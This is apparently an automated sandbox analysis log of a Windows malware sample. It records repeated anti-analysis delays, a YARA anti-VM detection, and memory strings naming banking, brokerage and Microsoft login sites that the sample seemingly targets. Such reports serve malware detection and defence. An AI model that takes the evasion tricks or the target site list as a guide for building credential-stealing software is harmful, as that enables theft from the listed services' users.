                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 9A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 2720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 8850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 9850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 9A50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: AA50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 32F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599110Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597640Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeWindow / User API: threadDelayed 1522Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeWindow / User API: threadDelayed 8323Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7948Thread sleep count: 1522 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7948Thread sleep count: 8323 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599110Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597640Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594360Jump to behavior
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                    Source: kP8EgMorTr.exe, 00000003.00000002.3698800936.00000000014D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E997B0 LdrInitializeThunk,3_2_05E997B0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess created: C:\Users\user\Desktop\kP8EgMorTr.exe "C:\Users\user\Desktop\kP8EgMorTr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Users\user\Desktop\kP8EgMorTr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Users\user\Desktop\kP8EgMorTr.exe VolumeInformationJump to behavior
